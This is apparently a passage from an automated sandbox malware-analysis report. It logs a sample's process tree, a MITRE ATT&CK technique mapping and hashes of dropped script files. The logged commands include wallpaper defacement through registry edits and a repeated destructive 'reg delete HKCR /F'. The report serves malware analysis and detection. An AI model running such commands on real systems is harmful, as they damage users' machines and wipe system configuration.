        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:4044
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:4032
    - - C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\9574.vbs
        5⤵
        
        PID:3092
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:3116
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:3160
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:3132
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:3180
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:3192
    - - C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\9574.vbs
        5⤵
        
        PID:3324
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:3368
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:3380
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:3548
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:3440
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:3444
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9574.vbs"
    3⤵
    PID:2656
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9574.vbs"
    3⤵
    PID:2364
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9574.vbs"
    3⤵
    PID:1752
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9574.vbs"
    3⤵
    PID:2160
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9574.vbs"
    3⤵
    PID:1612
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9574.vbs"
    3⤵
    PID:2500
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9574.vbs"
    3⤵
    PID:1256
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9574.vbs"
    3⤵
    PID:2980
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9574.vbs"
    3⤵
    PID:2272
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9574.vbs"
    3⤵
    PID:2236
- - C:\Windows\system32\reg.exe
    reg delete HKCR /F
    3⤵
    - Modifies registry class
    PID:3348
- - C:\Windows\system32\reg.exe
    reg delete HKCR /F
    3⤵
    PID:3528
- - C:\Windows\system32\reg.exe
    reg delete HKCR /F
    3⤵
    PID:3564
- - C:\Windows\system32\reg.exe
    reg delete HKCR /F
    3⤵
    PID:3432
- - C:\Windows\system32\reg.exe
    reg delete HKCR /F
    3⤵
    PID:3600
- - C:\Windows\system32\reg.exe
    reg delete HKCR /F
    3⤵
    PID:3580
- - C:\Windows\system32\reg.exe
    reg delete HKCR /F
    3⤵
    PID:3604
- - C:\Windows\system32\reg.exe
    reg delete HKCR /F
    3⤵
    PID:3632
- - C:\Windows\system32\reg.exe
    reg delete HKCR /F
    3⤵
    PID:3160
- - C:\Windows\system32\reg.exe
    reg delete HKCR /F
    3⤵
    PID:3460
- - C:\Windows\system32\reg.exe
    reg delete HKCR /F
    3⤵
    PID:3500
- - C:\Windows\system32\reg.exe
    reg delete HKCR /F
    3⤵
    PID:3452
- - C:\Windows\system32\reg.exe
    reg delete HKCR /F
    3⤵
    PID:3492
- - C:\Windows\system32\reg.exe
    reg delete HKCR /F
    3⤵
    PID:3480
- - C:\Windows\system32\reg.exe
    reg delete HKCR /F
    3⤵
    PID:3512
- - C:\Windows\system32\reg.exe
    reg delete HKCR /F
    3⤵
    PID:3532
- - C:\Windows\system32\reg.exe
    reg delete HKCR /F
    3⤵
    PID:1852
- - C:\Windows\system32\reg.exe
    reg delete HKCR /F
    3⤵
    PID:1272
- - C:\Windows\system32\reg.exe
    reg delete HKCR /F
    3⤵
    PID:2532
- - C:\Windows\system32\reg.exe
    reg delete HKCR /F
    3⤵
    PID:3636
- - C:\Windows\system32\reg.exe
    reg delete HKCR /F
    3⤵
    PID:2504
- - C:\Windows\system32\reg.exe
    reg delete HKCR /F
    3⤵
    PID:2940
- - C:\Windows\system32\reg.exe
    reg delete HKCR /F
    3⤵
    PID:2128
- - C:\Windows\system32\reg.exe
    reg delete HKCR /F
    3⤵
    PID:1616

C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{3F6B5E16-092A-41ED-930B-0B4125D91D4E}
1⤵
- System Location Discovery: System Language Discovery
PID:1632

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
PID:1664

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x0
1⤵
PID:1452

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

BITS Jobs

T1197

Privilege Escalation

Defense Evasion

BITS Jobs

T1197

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Defacement

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\10753.bat

Filesize
460B

MD5
0cb1e6630fb4e83b2d8f0e24d113c490

SHA1
bd14248d7b4a792d713c9364e502337529d10602

SHA256
388a00e4deefc63b897e40d7bac8a6dad22b7aaa81a2870fa62e39566b436222

SHA512
36ed729dae85d1ba63c4cbd3bf3c1bec0530e15d8a2a4b799fdceffd8b973f57ea18aa0b2afff18388a7674ae8325e70978380990f499a553e351e85cdc2386c

Download Submit
C:\Users\Admin\AppData\Local\Temp\14803.vbs

Filesize
1KB

MD5
135594160762ab9dd80794d7b34ab32a

SHA1
638fef88bbb5d310c51eda07ca10918a482ad3ac

SHA256
531eef292dba871300a5b31d9601bab2b8c03be17cc0aa28e216f82a5df01fa0

SHA512
19a8b0024abb6e22103aaf8654619ee803cb8ae2bfd21d6bb7c648a4dfb1a06936144d308cc3d0ebdd86d38b87434d2e3a152f541153d42d03b4ad767b72b54d

Download Submit
C:\Users\Admin\AppData\Local\Temp\15573.vbs

Filesize
106B

MD5
ec385d968eea8bf5abe4587305f39c89

SHA1
6509b0bb7cb6432a4c723f37dc7593116ad57c64

SHA256
98adff52d2e37335bc6fb9811a2759ab8bd86c6ca116818114a0ab88474a6f96

SHA512
d5ff6edac9fcc50a634ff949268004bc396a07bb472fce532166140964acbbb4195e99a02dae8a426e2c4f7a9c64a89d283361340615d89ef7465acbab5b26a8

Download Submit
C:\Users\Admin\AppData\Local\Temp\17270.vbs

Filesize
390B

MD5
aabbe725da9751315bbeeda4ef58d816

SHA1
476c78912d61e790a793c8e6606825f2b169947c

SHA256
0422247afae1a1556e7832c45f4f1913a61cbace2be53aad58967ea9e6315360

SHA512
0e1a523c947013a1a23574d125294270cb8c6b8e4fd97630f7c35122a33b9d95e7a073cbe23f0ed3f78246dd8b2db2c4401e994eace3b9e3bdbe696708b887dd

Download Submit
C:\Users\Admin\AppData\Local\Temp\18675.vbs

Filesize
179B

MD5
523092d53a06f5b46778a0cd7c01d0fb

SHA1
221a8244271afdbe7ce105aaf189f1dbcfa57cdb

SHA256
09c2ca44b387ae9f69f0c001729c71313bae1d935ad99723a02ebfc0d2757c3e

SHA512
72015f1a996c56b6eab20590cdb2689124b87494a2ae8fb5fb0678dfb4bfd49046f66b23b0348a70942d74664e22051d5be5994de518414baa47ad81e77400eb

Download Submit
C:\Users\Admin\AppData\Local\Temp\2110.vbs

Filesize
236B

MD5
3a7e0a94fa88dccd40d9b76b37d06db1

SHA1
d7604ddb660898ce3b1343aa712cf5926bc68bda

SHA256
368a1589e414e50d554cf0d871bd49b11f9cd9f189876c86a5caef92d158e6a4

SHA512
19b8377a708301fb719e43433b9c0a592346ea94206870e3ba2c77f901b17598dd977fd711e591b5d0fc46982ed83e62cfbbe678eabe43de494bdde176c89fcb

Download Submit
C:\Users\Admin\AppData\Local\Temp\2960.vbs

Filesize
490B

MD5
93e179454db6fe9ac81112193de37cde

SHA1
4752aec95d506cac3ed9c61f0fbbd9cf6bd0cde9

SHA256
8286f8a1d4cceae4ece0de6082109286f17c1234ee09e453ac9507185068c7cc

SHA512
a38411dd6eb30050e6100bd20e79e8f4d650c1a4ad646516370f603a28900dfc424292f83cd7b49b1296bf7b25ce6ce907ef8dee964ded2e6b79475a6741f207

Download Submit
C:\Users\Admin\AppData\Local\Temp\7654.vbs

Filesize
276B

MD5
8a9b451fd9936100f33b576bb5ec3f02

SHA1
80c92544f733ddfb96dffa296293fb2835e85f2e

SHA256
4e17707eab52e31f035b13f68cce1aa2636680abde9de955fdf1495641660455

SHA512
b11700e12cc1c921dbf3cd017595dbb18befdb5a89e80295aa99ef8d5d23d3e689bf6b011927da27cb88ac93feea8fcef822b4b7acd92c26b32d5791773e911f

Download Submit
C:\Users\Admin\AppData\Local\Temp\9574.vbs

Filesize
160B

MD5
cdbae35b84132217497f37712cbe9501

SHA1
12b306e49860ac8fd657c22c0222a33d94614720

SHA256
aa2e4e41ea20286abf73558d26cc181c1c1093de5809147ad32f8e8c91cdfb95

SHA512
25f670c56aff17a1c04b28a92b5cee7c8c41af94b41eaf0b4b480e262798626510387e642c639bf663eff39a6cff1d48356044d12dd000c0e3cfc72efeb81afa

Download Submit
C:\Users\Admin\AppData\Local\Temp\C909.tmp\C90A.tmp\C90B.bat

Filesize
8KB

MD5
074b0499fa7df4238b66cf7f0ab1ca64

SHA1
3ad09a2f3f51e5b4899397ec185672a6c0c4af18

SHA256
48fdcc988fd0f193c920c28ba7a8414497a4190278c8c077fda92a5349290b48

SHA512
496c6e1c462d40f5515ccf50b4ad7f14258782bc9329bad0c7776f4b22b66dd8790e181149604f87e816b865945dd4893c644b545aa84a4ed53ecfcabdca9686

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab466.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar498.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads